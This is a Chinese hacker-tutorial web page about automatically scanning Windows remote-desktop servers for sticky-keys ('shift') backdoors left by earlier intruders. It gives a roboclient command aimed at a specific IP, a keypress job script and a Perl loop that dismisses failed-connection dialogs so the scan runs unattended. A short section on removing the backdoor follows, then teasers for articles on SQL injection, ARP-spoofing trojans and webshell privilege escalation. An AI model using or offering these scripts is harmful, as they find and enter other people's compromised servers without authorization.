3389远程终端的SHIFT后门自动扫描[自动关闭错误连接]

所属分类: 网络安全 / 黑客教程 阅读数: 38
收藏 0 赞 0 分享
首先3389的SHIFT后门极少
其次大部分SHIFT后门都加密

所以手工一个一个尝试是挺傻的,写成自动扫描的话,还能让人忍受
需要用到的工具 roboclient
smclient -f:shift_backdoor.txt -s:125.91.15.254 -l:1 -v -d

shift_backdoor.txt:

job
{
connect("","","",1,1);
sleep(2000);
senddata("WM_KEYDOWN",16,2752513);
senddata("WM_KEYUP",16,3223977985);
senddata("WM_KEYDOWN",16,2752513);
senddata("WM_KEYUP",16,3223977985);
senddata("WM_KEYDOWN",16,2752513);
senddata("WM_KEYUP",16,3223977985);
senddata("WM_KEYDOWN",16,2752513);
senddata("WM_KEYUP",16,3223977985);
senddata("WM_KEYDOWN",16,2752513);
senddata("WM_KEYUP",16,3223977985);
sleep(2000);
disconnect();
}

有些SHIFT后门被改成了按7次SHIFT,或者是WIN+U后门,改改shift_backdoor.txt把功能加进去即可

自动关闭错误连接

复制代码
代码如下:

#!/usr/bin/perl
use warnings;
use Win32::GUI;
use constant WM_CLOSE => 16;
sub monitor {
my $handle = Win32::GUI::FindWindow('', '中断远程桌面连接');
Win32::GUI::SendMessage($handle, WM_CLOSE, 0, 0);
}
sub monitor1 {
my $handle = Win32::GUI::FindWindow('', '断开 Windows 会话');
Win32::GUI::SendMessage($handle, WM_CLOSE, 0, 0);
}
while(1){
&monitor;
&monitor1;
sleep(2);
}



shift后门的解决办法
一日在网上看到了shift后门,说是按5下shift键服务器的系统盘就蹦出来了,不用输入密码!我一看,就怀着好奇的想法试了下果真如此,难怪我们的服务器总是出问题,查了下解决办法现在发出来,希望和我一样的菜鸟X级网管能有用。
打开控制面板--辅助功能选项--粘滞键--设置--去掉使用快捷键的勾

还有要改下copy.exe的权限,不过在这里推荐大家把c盘所有的程序都 改下,只有administrator才能访问

shift后门的预防解决办法:预防很简单的,连敲5次shift,然后在弹出的设置里面取消连滞键
已经中了的话
attrib c:\windows\system32\sethc.exe -h
attrib c:\windows\system32\dllcache\sethc.exe -h
拷贝新的 c:\windows\system32\sethc.exe 文件到 c:\windows\system32\目录下;拷贝新的c:\windows\system32\dllcache\sethc.exe到c:\windows\system32\dllcache\目录下
收工!
更多精彩内容其他人还在看

破解数据库下载漏洞

作为脚本漏洞的头号杀手锏——数据库下载漏洞,现在已经被越来越多的人所熟知。在这个信息化技术更新飞快的时代,漏洞产生后随之而来的就是各种应对的招数,比如改数据库的后缀、修改数据库的名字等等。很多人以为只要这么做就可以解决问题了,但事实往往不如你
收藏 0 赞 0 分享

看黑客怎样汇编创建简单的窗口

理论: Windows 程序中,在写图形用户界面时需要调用大量的标准 Windows Gui 函数。其实这对用户和程序员来说都有好处,对于用户,面对的是同一套标准的窗口,对这些窗口的操作都是一样的,所以使用不同的应用程序时无须重新学习操作。对程序员来说,这些 Gui 源代码
收藏 0 赞 0 分享

新的挂马方式-ARP欺骗

网页挂马最难的就是传播了,小网站易入侵但是访问人数不多,收获的肉鸡也就不是很多。因此,一种新的挂马方式开始流行——局域网ARP欺骗挂马,只要局域网内一台机子中招了,它就可以在内网传播含有木马的网页,捕获的肉鸡就会成几何增长。   局域网ARP欺骗挂马的好处
收藏 0 赞 0 分享

教你如何手工注入猜解语句

猜解表名: and exists (select * from 表名) 猜解列名: and exists (select 字段 from 表名) UNION法: 联合查询: select name,password,id from user union s
收藏 0 赞 0 分享

扫不出肉鸡的常见原因

扫不出肉鸡有很多的可能!一般有如下的情况!   1.你系统的防火墙,或某些补丁作怪!   2.有些地方是扫不到肉鸡的(是不是和各地的电信有关,暂时还不知道)   3.机子设置有关!   4.扫描的网段没有肉鸡(空IPC的2000机子,其实现在已比较少的了)  
收藏 0 赞 0 分享

许多高手提升权限技巧

当我们取得一个webshell时候,下一部要做的就是提升权限   个人总结如下:   1: C:Documents and SettingsAll UsersApplication DataSymantecpcAnywhere 看能否跳转到这个目录,如果行那就
收藏 0 赞 0 分享

教你两句话 动网8.20的后台被拿下

dvbbs8.2漏洞补下载地址: http://bbs.dvbbs.net/dispbbs.asp?boardid=8&;Id=1519564 紧急安全补丁0530 dvbbs8.2漏洞的产生 login.asp 这个文件的97行Function D
收藏 0 赞 0 分享

黑客技巧:利用Log备份获取Webshell

dbowner通过注射得到一个shell应该不是什么难事情了,比较麻烦的是就算利用增量备份,仍然有很多不确定的因素,如果之前别人有过什么错误的写入信息,可能备份出来得到的还是一些不能用的500错误,如何能够提高成功率及重用性呢?如果单从调整增量备份的方式来看,尽管能
收藏 0 赞 0 分享

教你如何用ISAPI_Rewrite做IIS防盗链

“盗链”的定义是:此内容不在自己服务器上,而通过技术手段,绕过别人放广告有利益的最终页,直接在自己的有广告有利益的页面上向最终用户提供此内容。 常常是一些名不见经传的小网站来盗取一些有实力的大网站的地址(比如一些音乐、图片、软件的下载地址)然后放置在自
收藏 0 赞 0 分享

浅谈文件捆绑技术方式(图)

随着恶意代码的发展越来越广泛,以及其强大的破坏性和更多样的传播方式,给人们带来更多的危害。叶子在前面的文章中已经跟大家谈过恶意代码的基本概念以及对其的研究分析流程。在本篇文章中叶子将给大家介绍一下恶意代码的传播方式之一的捆绑技术,以及常见的Winrar自解压
收藏 0 赞 0 分享
查看更多